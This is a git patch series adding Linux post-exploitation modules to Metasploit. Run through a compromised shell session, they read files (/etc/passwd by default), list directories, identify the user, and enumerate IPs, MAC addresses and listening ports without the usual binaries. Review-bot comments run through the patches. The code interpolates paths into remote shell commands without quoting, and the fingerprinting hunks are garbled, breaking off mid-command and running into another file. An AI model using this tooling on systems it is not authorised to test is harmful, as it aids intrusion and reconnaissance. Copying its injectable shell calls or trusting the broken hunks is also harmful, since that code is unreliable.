From c9a4cc47f7bd5afa2b4d42c34c894fdeab2ab5a5 Mon Sep 17 00:00:00 2001
From: root
Date: Thu, 31 May 2018 18:05:33 +0200
Subject: [PATCH 01/21] Initial upload of Vulnerateca Post-Exploitation Framework (VPEF)
---
 lib/msf/core/post/linux.rb | 3 +
 .../post/linux/vpef/vpef_core_commands.rb | 70 ++++++++
 .../core/post/linux/vpef/vpef_core_common.rb | 45 ++++++
 .../linux/vpef/vpef_core_fingerprinting.rb | 149 ++++++++++++++++++
 modules/post/linux/vpef/vpef_cat.rb | 37 +++++
 .../post/linux/vpef/vpef_fingerprinting.rb | 80 ++++++++++
 modules/post/linux/vpef/vpef_ls.rb | 41 +++++
 7 files changed, 425 insertions(+)
 create mode 100644 lib/msf/core/post/linux/vpef/vpef_core_commands.rb
 create mode 100644 lib/msf/core/post/linux/vpef/vpef_core_common.rb
 create mode 100644 lib/msf/core/post/linux/vpef/vpef_core_fingerprinting.rb
 create mode 100644 modules/post/linux/vpef/vpef_cat.rb
 create mode 100644 modules/post/linux/vpef/vpef_fingerprinting.rb
 create mode 100644 modules/post/linux/vpef/vpef_ls.rb
diff --git a/lib/msf/core/post/linux.rb b/lib/msf/core/post/linux.rb
index 7ac85b867c8b..35be5edfc971 100644
--- a/lib/msf/core/post/linux.rb
+++ b/lib/msf/core/post/linux.rb
@@ -4,4 +4,7 @@ module Msf::Post::Linux
 require 'msf/core/post/linux/system'
 require 'msf/core/post/linux/kernel'
 require 'msf/core/post/linux/busy_box'
+ require 'msf/core/post/linux/vpef/vpef_core_commands'
+ require 'msf/core/post/linux/vpef/vpef_core_common'
+ require 'msf/core/post/linux/vpef/vpef_core_fingerprinting'
 end
diff --git a/lib/msf/core/post/linux/vpef/vpef_core_commands.rb b/lib/msf/core/post/linux/vpef/vpef_core_commands.rb
new file mode 100644
index 000000000000..936d5c637750
--- /dev/null
+++ b/lib/msf/core/post/linux/vpef/vpef_core_commands.rb
@@ -0,0 +1,70 @@ +# -*- coding: binary -*- + +require 'msf/core' + +module Msf +class Post +module Linux +module Vulnerateca + + include ::Msf::Post::Common + include ::Msf::Post::File + + def vulnerateca_ls(d) + result = vulnerateca_list_directory(d) + return result + end + + def vulnerateca_cat(f) + result = vulnerateca_read_file(f) + return result + end + + def vulnerateca_pwd() + result = [] + str_pwd = cmd_exec("echo $PWD") + result.insert(-1,str_pwd) + return result + end + + def vulnerateca_uniq(list) + uniq_list = [] + list.each do |elem| + if not uniq_list.include?(elem) + uniq_list.insert(-1, elem) + end + end + return uniq_list + end + + def vulnerateca_whoami() + result = [] + shellpid = vulnerateca_shell_pid() + statuspid = vulnerateca_pid_uid(shellpid) + + statuspid.each do |line| + split = line.split(":") + if split[0] == "Uid" + regex = /.*\s(.*)\s/ + useridtmp = split[1] + userid = useridtmp[regex, 1] + uid = userid.to_s + passwd = vulnerateca_read_file("/etc/passwd") + passwd.each do |line| + parts = line.split(":") + uid_passwd = parts[2].to_s + user = parts[0].to_s + if uid_passwd == uid + result.insert(-1,user) + return result + end + end + end + end + return "Error en funcion whoami" + end + +end # Vulnerateca +end # Linux +end # Post +end # Msf diff --git a/lib/msf/core/post/linux/vpef/vpef_core_common.rb b/lib/msf/core/post/linux/vpef/vpef_core_common.rb new file mode 100644 index 000000000000..9507eb8b02d2 --- /dev/null +++ b/lib/msf/core/post/linux/vpef/vpef_core_common.rb 
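Review bot: `vulnerateca_whoami` extracts the wrong number from the `Uid` line: with four whitespace-separated values after the colon (on Linux the real, effective, saved and filesystem UIDs), the greedy `/.*\s(.*)\s/` applied to `split[1]` captures the third value, not the first, so the `/etc/passwd` lookup names the wrong account whenever those fields differ (set-uid shells); `uid = split[1].split[0]` takes the real UID regardless of tab or space separation. The failure path is also the wrong type: `return "Error en funcion whoami"` hands a String to callers that index `[0]` (vpef_fingerprinting.rb here, pepa_whoami.rb in PATCH 03), which then print the letter `E` as the user name; returning `[]` makes the callers' `[0]` nil instead. The PATCH 02 rename of this file keeps both behaviours. `vulnerateca_pid_uid` is defined in the fingerprinting file, whose hunk is garbled on this page, so the exact line format is inferred from the `Uid` prefix checked here.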
@@ -0,0 +1,45 @@ +# -*- coding: binary -*- + +require 'msf/core' + +module Msf +class Post +module Linux +module Vulnerateca + + include ::Msf::Post::Common + include ::Msf::Post::File + + def vulnerateca_read_file(f) + result = [] + str_file = cmd_exec("while read line; do echo $line; done <#{f}") + parts = str_file.split("\n") + parts.each do |line| + line = line.strip() + result.insert(-1,line) + end + return result + end + + def vulnerateca_list_directory(d) + result = [] + if d == "" + d = vulnerateca_pwd()[0] + "/" + elsif d[-1] == '/' + d = d + else + d = d + "/" + end + str_ls = cmd_exec("for fn in #{d}*; do echo $fn; done") + parts = str_ls.split("\n") + parts.each do |line| + line = line.strip() + result.insert(-1,line) + end + return result + end + +end # Vulnerateca +end # Linux +end # Post +end # Msf diff --git a/lib/msf/core/post/linux/vpef/vpef_core_fingerprinting.rb b/lib/msf/core/post/linux/vpef/vpef_core_fingerprinting.rb new file mode 100644 index 000000000000..282e45353ea2 --- /dev/null +++ b/lib/msf/core/post/linux/vpef/vpef_core_fingerprinting.rb 
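Review bot: `vulnerateca_read_file` does not return the file's lines as written: the loop reads with `read` (no `-r`, so backslashes are consumed) and prints with an unquoted `echo $line`, so the remote shell word-splits each line, collapses its whitespace and expands any `*`, `?` or `[` into matching path names, and `echo` swallows a line that starts with `-n` or `-e` — `vulnerateca_whoami` parses `/etc/passwd` through this path. `f` and `d` are likewise interpolated unquoted (`done <#{f}`, `for fn in #{d}*`), so a path containing a space is split by the remote shell. A faithful loop is `cmd_exec("while IFS= read -r line; do printf '%s\\n' \"$line\"; done < \"#{f}\"")`. The same two loops are reintroduced in PATCH 04 as the `cat`-less and `ls`-less fallbacks in lib/msf/core/post/file.rb, which survive after this file is deleted.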
@@ -0,0 +1,149 @@ +# -*- coding: binary -*- + +require 'msf/core' + +module Msf +class Post +module Linux +module Vulnerateca + + include ::Msf::Post::Common + include ::Msf::Post::File + + def vulnerateca_users() + result = [] + str_users = cmd_exec("while read line; do echo $line; done 'Vulnerateca Read File (cat without cat)', + 'Description' => %q{ + This module will be applied on a session connected to a shell. It will + extract content from a given. + }, + 'Author' => 'Alberto Rafael Rodriguez Iglesias ', + 'License' => MSF_LICENSE, + 'Platform' => ['linux'], + 'SessionTypes' => ['shell'] + ) + register_options( + [ + OptString.new('FILENAME', [true, 'File path to read, default /etc/passwd','/etc/passwd']) + ]) + end + + def run + file = datastore['FILENAME'] + print_status("Doing cat without cat command in FILENAME: #{file}") + cat_result=vulnerateca_cat(file) + cat_result.each do |line| + print_line(line) + end + print_line("\n") + end +end diff --git a/modules/post/linux/vpef/vpef_fingerprinting.rb b/modules/post/linux/vpef/vpef_fingerprinting.rb new file mode 100644 index 000000000000..60ecba3b4f40 --- /dev/null +++ b/modules/post/linux/vpef/vpef_fingerprinting.rb 
@@ -0,0 +1,80 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Post + include Msf::Post::File + include Msf::Post::Linux::Vulnerateca + + def initialize + super( + 'Name' => 'Vulnerateca Fingerprinting Module', + 'Description' => %q{ + This module will be applied on a session connected to a shell. It will + extract different information from target system. + }, + 'Author' => 'Alberto Rafael Rodriguez Iglesias ', + 'License' => MSF_LICENSE, + 'Platform' => ['linux'], + 'SessionTypes' => ['shell'] + ) + end + + def run + print_status(" -- Session Information --") + print "Current Shell: " + vulnerateca_shell()[0] + current_user = vulnerateca_whoami()[0] + print "\nCurrent User: " + current_user + print "\nIs Current User root?: " + vulnerateca_isroot?(current_user)[0] + print "\nCurrent Shell PID: " + vulnerateca_shell_pid().to_s + print "\n" + print "\n" + + print_status(" -- System Information --") + print "Current PATH env ($PATH): " + vulnerateca_path()[0] + print "\n" + print "\n" + + print_status(" -- Network Information --") + print "\n" + print_good("List of local IPs:") + ips = vulnerateca_ips() + ips.each do |ip| + print "\n" + ip + end + + print "\n" + print "\n" + print_good("List of local network interfaces:") + ifaces = vulnerateca_interfaces() + ifaces.each do |iface| + print "\n" + iface + end + + print "\n" + print "\n" + print_good("List of local MAC addresses:") + macs = vulnerateca_macs() + macs.each do |mac| + print "\n" +mac + end + + print "\n" + print "\n" + print_good("List of listening TCP ports:") + tcp_ports = vulnerateca_listen_tcp_ports() + tcp_ports.each do |tcp_port| + print "\n" + tcp_port.to_s + end + + print "\n" + print "\n" + print_good("List of listening UDP ports:") + udp_ports = vulnerateca_listen_udp_ports() + udp_ports.each do |udp_port| + print udp_port.to_s + "\n" + end + print "\n" + end +end 
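Review bot: Every line of `run` builds its output with `String + helper()[0]`, so the first helper that returns an empty array aborts the whole module with a TypeError on `+ nil`, and `vulnerateca_whoami`'s error String makes `current_user` the single letter `E` with nothing flagged. Interpolation through the framework printers avoids both, e.g. `print_line("Current Shell: #{vulnerateca_shell().first}")` and `print_line("Current User: #{current_user}")`, since nil interpolates to an empty string and the manual `"\n"` plumbing disappears. The helpers themselves live in vpef_core_fingerprinting.rb, whose hunk is garbled in this view, so the empty-array case is inferred from the `[0]` indexing rather than observed.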
diff --git a/modules/post/linux/vpef/vpef_ls.rb b/modules/post/linux/vpef/vpef_ls.rb new file mode 100644 index 000000000000..cbf4f1faed9e --- /dev/null +++ b/modules/post/linux/vpef/vpef_ls.rb @@ -0,0 +1,41 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Post + include Msf::Post::File + include Msf::Post::Linux::Vulnerateca + + def initialize + super( + 'Name' => 'Vulnerateca List Directory (ls without ls)', + 'Description' => %q{ + This module will be applied on a session connected to a shell. It will + extract a list of files and folders on a given dir. + }, + 'Author' => 'Alberto Rafael Rodriguez Iglesias ', + 'License' => MSF_LICENSE, + 'Platform' => ['linux'], + 'SessionTypes' => ['shell'] + ) + register_options( + [ + OptString.new('DIR', [false, 'Optional directory name to list, default current session path','']) + ]) + end + + def run + dir = datastore['DIR'] + if dir == "" + print_status("Doing ls without ls command in current session path DIR") + else + print_status("Doing ls without ls command in DIR: #{dir}") + end + ls_result=vulnerateca_ls(dir) + ls_result.each do |line| + print_line(line) + end + print_line("\n") + end +end From 6df8e28f7ef59d59ce05fde1204a6ea7c2d9c0f7 Mon Sep 17 00:00:00 2001 
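Review bot: `datastore['DIR']` is handed unchanged to `vulnerateca_ls`, which in vpef_core_common.rb interpolates it unquoted into `for fn in #{d}*`, so a directory name containing a space or a shell metacharacter is word-split or interpreted by the remote shell instead of being listed; the option should be quoted where it reaches the shell, and this module is the place to reject names it cannot pass safely. The `dir == ""` test also misses nil: if the datastore yields nil for the unset optional option, the helper's `d[-1]` raises NoMethodError. `dir = datastore['DIR'].to_s` covers that case in one line.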
From: root Date: Fri, 1 Jun 2018 02:06:25 +0200 Subject: [PATCH 02/21] Some syntax fixes and name changes --- lib/msf/core/post/linux.rb | 6 +- .../pepa_core_commands.rb} | 28 +++---- .../pepa_core_common.rb} | 17 ++-- .../pepa_core_fingerprinting.rb} | 80 +++++++++---------- .../{vpef/vpef_cat.rb => pepa/pepa_cat.rb} | 10 +-- .../pepa_fingerprinting.rb} | 28 +++---- .../{vpef/vpef_ls.rb => pepa/pepa_ls.rb} | 14 ++-- 7 files changed, 89 insertions(+), 94 deletions(-) rename lib/msf/core/post/linux/{vpef/vpef_core_commands.rb => pepa/pepa_core_commands.rb} (72%) rename lib/msf/core/post/linux/{vpef/vpef_core_common.rb => pepa/pepa_core_common.rb} (78%) rename lib/msf/core/post/linux/{vpef/vpef_core_fingerprinting.rb => pepa/pepa_core_fingerprinting.rb} (69%) rename modules/post/linux/{vpef/vpef_cat.rb => pepa/pepa_cat.rb} (82%) rename modules/post/linux/{vpef/vpef_fingerprinting.rb => pepa/pepa_fingerprinting.rb} (71%) rename modules/post/linux/{vpef/vpef_ls.rb => pepa/pepa_ls.rb} (65%) diff --git a/lib/msf/core/post/linux.rb b/lib/msf/core/post/linux.rb index 35be5edfc971..121f18e7fe2f 100644 --- a/lib/msf/core/post/linux.rb +++ b/lib/msf/core/post/linux.rb @@ -4,7 +4,7 @@ module Msf::Post::Linux require 'msf/core/post/linux/system' require 'msf/core/post/linux/kernel' require 'msf/core/post/linux/busy_box' - require 'msf/core/post/linux/vpef/vpef_core_commands' - require 'msf/core/post/linux/vpef/vpef_core_common' - require 'msf/core/post/linux/vpef/vpef_core_fingerprinting' + require 'msf/core/post/linux/pepa/pepa_core_commands' + require 'msf/core/post/linux/pepa/pepa_core_common' + require 'msf/core/post/linux/pepa/pepa_core_fingerprinting' end diff --git a/lib/msf/core/post/linux/vpef/vpef_core_commands.rb b/lib/msf/core/post/linux/pepa/pepa_core_commands.rb similarity index 72% rename from lib/msf/core/post/linux/vpef/vpef_core_commands.rb rename to lib/msf/core/post/linux/pepa/pepa_core_commands.rb index 936d5c637750..36126b9ba66a 100644 
--- a/lib/msf/core/post/linux/vpef/vpef_core_commands.rb +++ b/lib/msf/core/post/linux/pepa/pepa_core_commands.rb @@ -1,33 +1,32 @@ # -*- coding: binary -*- - require 'msf/core' module Msf class Post module Linux -module Vulnerateca +module Pepa include ::Msf::Post::Common include ::Msf::Post::File - def vulnerateca_ls(d) - result = vulnerateca_list_directory(d) + def pepa_ls(d) + result = pepa_list_directory(d) return result end - def vulnerateca_cat(f) - result = vulnerateca_read_file(f) + def pepa_cat(f) + result = pepa_read_file(f) return result end - def vulnerateca_pwd() + def pepa_pwd() result = [] str_pwd = cmd_exec("echo $PWD") result.insert(-1,str_pwd) return result end - def vulnerateca_uniq(list) + def pepa_uniq(list) uniq_list = [] list.each do |elem| if not uniq_list.include?(elem) @@ -37,11 +36,10 @@ def vulnerateca_uniq(list) return uniq_list end - def vulnerateca_whoami() + def pepa_whoami() result = [] - shellpid = vulnerateca_shell_pid() - statuspid = vulnerateca_pid_uid(shellpid) - + shellpid = pepa_shell_pid() + statuspid = pepa_pid_uid(shellpid) statuspid.each do |line| split = line.split(":") if split[0] == "Uid" @@ -49,7 +47,7 @@ def vulnerateca_whoami() useridtmp = split[1] userid = useridtmp[regex, 1] uid = userid.to_s - passwd = vulnerateca_read_file("/etc/passwd") + passwd = pepa_read_file("/etc/passwd") passwd.each do |line| parts = line.split(":") uid_passwd = parts[2].to_s @@ -61,10 +59,10 @@ def vulnerateca_whoami() end end end - return "Error en funcion whoami" + return "Whoami function error" end -end # Vulnerateca +end # Pepa end # Linux end # Post end # Msf diff --git a/lib/msf/core/post/linux/vpef/vpef_core_common.rb b/lib/msf/core/post/linux/pepa/pepa_core_common.rb similarity index 78% rename from lib/msf/core/post/linux/vpef/vpef_core_common.rb rename to lib/msf/core/post/linux/pepa/pepa_core_common.rb index 9507eb8b02d2..580eee13647a 100644 --- a/lib/msf/core/post/linux/vpef/vpef_core_common.rb 
+++ b/lib/msf/core/post/linux/pepa/pepa_core_common.rb @@ -1,34 +1,33 @@ # -*- coding: binary -*- - require 'msf/core' module Msf class Post module Linux -module Vulnerateca +module Pepa include ::Msf::Post::Common include ::Msf::Post::File - def vulnerateca_read_file(f) + def pepa_read_file(f) result = [] str_file = cmd_exec("while read line; do echo $line; done <#{f}") parts = str_file.split("\n") parts.each do |line| - line = line.strip() + line = line.strip() result.insert(-1,line) end return result end - def vulnerateca_list_directory(d) + def pepa_list_directory(d) result = [] if d == "" - d = vulnerateca_pwd()[0] + "/" + d = pepa_pwd()[0] + "/" elsif d[-1] == '/' - d = d + d = d else - d = d + "/" + d = d + "/" end str_ls = cmd_exec("for fn in #{d}*; do echo $fn; done") parts = str_ls.split("\n") @@ -39,7 +38,7 @@ def vulnerateca_list_directory(d) return result end -end # Vulnerateca +end # Pepa end # Linux end # Post end # Msf diff --git a/lib/msf/core/post/linux/vpef/vpef_core_fingerprinting.rb b/lib/msf/core/post/linux/pepa/pepa_core_fingerprinting.rb similarity index 69% rename from lib/msf/core/post/linux/vpef/vpef_core_fingerprinting.rb rename to lib/msf/core/post/linux/pepa/pepa_core_fingerprinting.rb index 282e45353ea2..7a86755e121a 100644 --- a/lib/msf/core/post/linux/vpef/vpef_core_fingerprinting.rb +++ b/lib/msf/core/post/linux/pepa/pepa_core_fingerprinting.rb 
@@ -1,28 +1,27 @@ # -*- coding: binary -*- - require 'msf/core' module Msf class Post module Linux -module Vulnerateca +module Pepa include ::Msf::Post::Common include ::Msf::Post::File - def vulnerateca_users() + def pepa_users() result = [] str_users = cmd_exec("while read line; do echo $line; done 'Vulnerateca Read File (cat without cat)', + 'Name' => 'PEPA Read File (cat without cat)', 'Description' => %q{ This module will be applied on a session connected to a shell. It will - extract content from a given. + extract content from a given file. }, 'Author' => 'Alberto Rafael Rodriguez Iglesias ', 'License' => MSF_LICENSE, @@ -28,9 +28,9 @@ def initialize def run file = datastore['FILENAME'] print_status("Doing cat without cat command in FILENAME: #{file}") - cat_result=vulnerateca_cat(file) + cat_result=pepa_cat(file) cat_result.each do |line| - print_line(line) + print_line(line) end print_line("\n") end diff --git a/modules/post/linux/vpef/vpef_fingerprinting.rb b/modules/post/linux/pepa/pepa_fingerprinting.rb similarity index 71% rename from modules/post/linux/vpef/vpef_fingerprinting.rb rename to modules/post/linux/pepa/pepa_fingerprinting.rb index 60ecba3b4f40..620c2f7aa38a 100644 --- a/modules/post/linux/vpef/vpef_fingerprinting.rb +++ b/modules/post/linux/pepa/pepa_fingerprinting.rb @@ -5,11 +5,11 @@ class MetasploitModule < Msf::Post include Msf::Post::File - include Msf::Post::Linux::Vulnerateca + include Msf::Post::Linux::Pepa def initialize super( - 'Name' => 'Vulnerateca Fingerprinting Module', + 'Name' => 'PEPA Fingerprinting Module', 'Description' => %q{ This module will be applied on a session connected to a shell. It will extract different information from target system. 
@@ -23,31 +23,31 @@ def initialize def run print_status(" -- Session Information --") - print "Current Shell: " + vulnerateca_shell()[0] - current_user = vulnerateca_whoami()[0] + print "Current Shell: " + pepa_shell()[0] + current_user = pepa_whoami()[0] print "\nCurrent User: " + current_user - print "\nIs Current User root?: " + vulnerateca_isroot?(current_user)[0] - print "\nCurrent Shell PID: " + vulnerateca_shell_pid().to_s + print "\nIs Current User root?: " + pepa_isroot?(current_user)[0] + print "\nCurrent Shell PID: " + pepa_shell_pid().to_s print "\n" print "\n" print_status(" -- System Information --") - print "Current PATH env ($PATH): " + vulnerateca_path()[0] + print "Current PATH env ($PATH): " + pepa_path()[0] + print "\n" print "\n" - print "\n" print_status(" -- Network Information --") print "\n" print_good("List of local IPs:") - ips = vulnerateca_ips() + ips = pepa_ips() ips.each do |ip| - print "\n" + ip + print "\n" + ip end print "\n" print "\n" print_good("List of local network interfaces:") - ifaces = vulnerateca_interfaces() + ifaces = pepa_interfaces() ifaces.each do |iface| print "\n" + iface end @@ -55,7 +55,7 @@ def run print "\n" print "\n" print_good("List of local MAC addresses:") - macs = vulnerateca_macs() + macs = pepa_macs() macs.each do |mac| print "\n" +mac end @@ -63,7 +63,7 @@ def run print "\n" print "\n" print_good("List of listening TCP ports:") - tcp_ports = vulnerateca_listen_tcp_ports() + tcp_ports = pepa_listen_tcp_ports() tcp_ports.each do |tcp_port| print "\n" + tcp_port.to_s end @@ -71,7 +71,7 @@ def run print "\n" print "\n" print_good("List of listening UDP ports:") - udp_ports = vulnerateca_listen_udp_ports() + udp_ports = pepa_listen_udp_ports() udp_ports.each do |udp_port| print udp_port.to_s + "\n" end 
diff --git a/modules/post/linux/vpef/vpef_ls.rb b/modules/post/linux/pepa/pepa_ls.rb similarity index 65% rename from modules/post/linux/vpef/vpef_ls.rb rename to modules/post/linux/pepa/pepa_ls.rb index cbf4f1faed9e..fb56fa5429f3 100644 --- a/modules/post/linux/vpef/vpef_ls.rb +++ b/modules/post/linux/pepa/pepa_ls.rb @@ -5,16 +5,16 @@ class MetasploitModule < Msf::Post include Msf::Post::File - include Msf::Post::Linux::Vulnerateca + include Msf::Post::Linux::Pepa def initialize super( - 'Name' => 'Vulnerateca List Directory (ls without ls)', + 'Name' => 'PEPA List Directory (ls without ls)', 'Description' => %q{ This module will be applied on a session connected to a shell. It will extract a list of files and folders on a given dir. }, - 'Author' => 'Alberto Rafael Rodriguez Iglesias ', + 'Author' => 'Alberto Rafael Rodriguez Iglesias ', 'License' => MSF_LICENSE, 'Platform' => ['linux'], 'SessionTypes' => ['shell'] @@ -28,13 +28,13 @@ def initialize def run dir = datastore['DIR'] if dir == "" - print_status("Doing ls without ls command in current session path DIR") + print_status("Doing ls without ls command in current session path DIR") else - print_status("Doing ls without ls command in DIR: #{dir}") + print_status("Doing ls without ls command in DIR: #{dir}") end - ls_result=vulnerateca_ls(dir) + ls_result=pepa_ls(dir) ls_result.each do |line| - print_line(line) + print_line(line) end print_line("\n") end From 96cd65a205ed83e83eb8905c19b4ee2e6426af4e Mon Sep 17 00:00:00 2001 From: AlbertoCoding Date: Fri, 1 Jun 2018 02:57:03 +0200 Subject: [PATCH 03/21] Added new whoami module and some fixes --- modules/post/linux/pepa/pepa_cat.rb | 1 - modules/post/linux/pepa/pepa_ls.rb | 3 +-- modules/post/linux/pepa/pepa_whoami.rb | 29 ++++++++++++++++++++++++++ 3 files changed, 30 insertions(+), 3 deletions(-) create mode 100644 modules/post/linux/pepa/pepa_whoami.rb 
diff --git a/modules/post/linux/pepa/pepa_cat.rb b/modules/post/linux/pepa/pepa_cat.rb
index ba991f719d7e..dd36f73ee965 100644
--- a/modules/post/linux/pepa/pepa_cat.rb
+++ b/modules/post/linux/pepa/pepa_cat.rb
@@ -32,6 +32,5 @@ def run
 cat_result.each do |line|
 print_line(line)
 end
- print_line("\n")
 end
 end
diff --git a/modules/post/linux/pepa/pepa_ls.rb b/modules/post/linux/pepa/pepa_ls.rb
index fb56fa5429f3..dcd292026319 100644
--- a/modules/post/linux/pepa/pepa_ls.rb
+++ b/modules/post/linux/pepa/pepa_ls.rb
@@ -30,12 +30,11 @@ def run
 if dir == ""
 print_status("Doing ls without ls command in current session path DIR")
 else
- print_status("Doing ls without ls command in DIR: #{dir}")
+ print_status("Doing ls without ls command in DIR: #{dir}")
 end
 ls_result=pepa_ls(dir)
 ls_result.each do |line|
 print_line(line)
 end
- print_line("\n")
 end
 end
diff --git a/modules/post/linux/pepa/pepa_whoami.rb b/modules/post/linux/pepa/pepa_whoami.rb
new file mode 100644
index 000000000000..f0df4534b20c
--- /dev/null
+++ b/modules/post/linux/pepa/pepa_whoami.rb
@@ -0,0 +1,29 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Post
+ include Msf::Post::File
+ include Msf::Post::Linux::Pepa
+
+ def initialize
+ super(
+ 'Name' => 'PEPA Whoami (whoami without whoami)',
+ 'Description' => %q{
+ This module will be applied on a session connected to a shell. It will
+ extract current username.
+ },
+ 'Author' => 'Alberto Rafael Rodriguez Iglesias ',
+ 'License' => MSF_LICENSE,
+ 'Platform' => ['linux'],
+ 'SessionTypes' => ['shell']
+ )
+ end
+
+ def run
+ print_status("Doing whoami without whoami command")
+ whoami_result=pepa_whoami()[0]
+ print_line(whoami_result)
+ end
+end
From be1ea1549e0f224c71cd01beef389391f862957f Mon Sep 17 00:00:00 2001
From: AlbertoCoding Date: Tue, 19 Jun 2018 12:39:41 +0200 Subject: [PATCH 04/21] Post-exploitation API improvements and pseudo_shell module added --- lib/msf/core/post/file.rb | 41 +++-- lib/msf/core/post/linux.rb | 3 - .../post/linux/pepa/pepa_core_commands.rb | 68 -------- .../core/post/linux/pepa/pepa_core_common.rb | 44 ----- .../linux/pepa/pepa_core_fingerprinting.rb | 147 ---------------- lib/msf/core/post/linux/priv.rb | 37 ++-- lib/msf/core/post/linux/system.rb | 148 +++++++++++++++- lib/msf/core/post/unix.rb | 30 +++- modules/post/linux/manage/pseudo_shell.rb | 159 ++++++++++++++++++ modules/post/linux/pepa/pepa_cat.rb | 36 ---- .../post/linux/pepa/pepa_fingerprinting.rb | 80 --------- modules/post/linux/pepa/pepa_ls.rb | 40 ----- modules/post/linux/pepa/pepa_whoami.rb | 29 ---- 13 files changed, 387 insertions(+), 475 deletions(-) delete mode 100644 lib/msf/core/post/linux/pepa/pepa_core_commands.rb delete mode 100644 lib/msf/core/post/linux/pepa/pepa_core_common.rb delete mode 100644 lib/msf/core/post/linux/pepa/pepa_core_fingerprinting.rb create mode 100644 modules/post/linux/manage/pseudo_shell.rb delete mode 100644 modules/post/linux/pepa/pepa_cat.rb delete mode 100644 modules/post/linux/pepa/pepa_fingerprinting.rb delete mode 100644 modules/post/linux/pepa/pepa_ls.rb delete mode 100644 modules/post/linux/pepa/pepa_whoami.rb diff --git a/lib/msf/core/post/file.rb b/lib/msf/core/post/file.rb index f931379de410..a27b8eff92b4 100644 --- a/lib/msf/core/post/file.rb +++ b/lib/msf/core/post/file.rb @@ -32,7 +32,12 @@ def pwd # and 2k return session.shell_command_token("echo %CD%") else - return session.shell_command_token("pwd") + if command_exists?("pwd") + return session.shell_command_token("pwd") + else + # Result on systems without pwd command + return session.shell_command_token("echo $PWD") + end end end end 
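Review bot: `pwd` now runs `command_exists?("pwd")` before every `pwd`, which doubles the shell round trips of a helper that the pseudo_shell module later in this series calls on every prompt; probing once and memoising the answer, `@pwd_available = command_exists?("pwd") if @pwd_available.nil?`, keeps the fallback without the per-call cost. Style: an `else` whose only content is another `if`/`else` is an `elsif` chain in Ruby. `command_exists?` is not defined in this patch, so whether it caches on its own could not be checked here.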
@@ -47,7 +52,22 @@ def dir(directory) if session.platform == 'windows' return session.shell_command_token("dir #{directory}").split(/[\r\n]+/) else - return session.shell_command_token("ls #{directory}").split(/[\r\n]+/) + if command_exists?("ls") + return session.shell_command_token("ls #{directory}").split(/[\r\n]+/) + else + # Result on systems without ls command + if directory[-1] != '/' + directory = directory + "/" + end + result = [] + data = session.shell_command_token("for fn in #{directory}*; do echo $fn; done") + parts = data.split("\n") + parts.each do |line| + line = line.split("/")[-1] + result.insert(-1,line) + end + return result + end end end end @@ -69,7 +89,6 @@ def directory?(path) else f = session.shell_command_token("test -d \"#{path}\" && echo true") end - return false if f.nil? || f.empty? return false unless f =~ /true/ true @@ -106,7 +125,6 @@ def file?(path) else f = session.shell_command_token("test -f \"#{path}\" && echo true") end - return false if f.nil? || f.empty? return false unless f =~ /true/ true @@ -128,7 +146,6 @@ def setuid?(path) if session.platform != 'windows' f = session.shell_command_token("test -u \"#{path}\" && echo true") end - return false if f.nil? || f.empty? return false unless f =~ /true/ true @@ -149,7 +166,6 @@ def exist?(path) else f = cmd_exec("test -e \"#{path}\" && echo true") end - return false if f.nil? || f.empty? return false unless f =~ /true/ true @@ -168,7 +184,6 @@ def file_local_write(local_file_name, data) unless ::File.exist?(local_file_name) ::FileUtils.touch(local_file_name) end - output = ::File.open(local_file_name, "a") data.each_line do |d| output.puts(d) @@ -275,6 +290,9 @@ def file_remote_digestsha2(file_name) # # @param file_name [String] Remote file name to read # @return [String] Contents of the file + # + # @return [Array] of strings(lines) + # def read_file(file_name) data = nil if session.type == "meterpreter" 
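Review bot: The `ls`-less branch of `dir` returns a bogus entry for an empty or unreadable directory: unless the remote shell has nullglob enabled, `for fn in #{directory}*` leaves the pattern unexpanded, the loop echoes `directory/*`, and `line.split("/")[-1]` turns it into a `*` entry in the result. The branch also evaluates `directory[-1]` before any nil check, so a nil `directory` now raises NoMethodError where the `ls` branch merely ran `ls` on an empty argument. Dropping the unexpanded pattern after the split, `parts.reject! { |l| l == "#{directory}*" }`, removes the phantom entry; the rest of `dir` and `command_exists?` are defined outside this hunk.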
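Review bot: The comment added above `read_file` documents a return type the method does not have: the hunk keeps the existing `@return [String] Contents of the file` and adds a second `@return [Array] of strings(lines)`, while every branch visible in this and the following hunk assigns a String from `shell_command_token` to `data`. Two contradictory `@return` tags will mislead the next caller; drop the added lines, and if callers are meant to receive lines, change the method where `data` is returned (outside this hunk) rather than the documentation alone.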
@@ -283,7 +301,12 @@ def read_file(file_name) if session.platform == 'windows' data = session.shell_command_token("type \"#{file_name}\"") else - data = session.shell_command_token("cat \"#{file_name}\"") + if command_exists?("cat") + data = session.shell_command_token("cat \"#{file_name}\"") + else + # Result on systems without cat command + data = session.shell_command_token("while read line; do echo $line; done <#{file_name}") + end end end @@ -308,7 +331,6 @@ def write_file(file_name, data) else _write_file_unix_shell(file_name, data) end - end true end @@ -387,7 +409,6 @@ def rm_rf(*remote_dirs) end end end - alias :file_rm :rm_f alias :dir_rm :rm_rf diff --git a/lib/msf/core/post/linux.rb b/lib/msf/core/post/linux.rb index 121f18e7fe2f..7ac85b867c8b 100644 --- a/lib/msf/core/post/linux.rb +++ b/lib/msf/core/post/linux.rb @@ -4,7 +4,4 @@ module Msf::Post::Linux require 'msf/core/post/linux/system' require 'msf/core/post/linux/kernel' require 'msf/core/post/linux/busy_box' - require 'msf/core/post/linux/pepa/pepa_core_commands' - require 'msf/core/post/linux/pepa/pepa_core_common' - require 'msf/core/post/linux/pepa/pepa_core_fingerprinting' end diff --git a/lib/msf/core/post/linux/pepa/pepa_core_commands.rb b/lib/msf/core/post/linux/pepa/pepa_core_commands.rb deleted file mode 100644 index 36126b9ba66a..000000000000 --- a/lib/msf/core/post/linux/pepa/pepa_core_commands.rb +++ /dev/null 
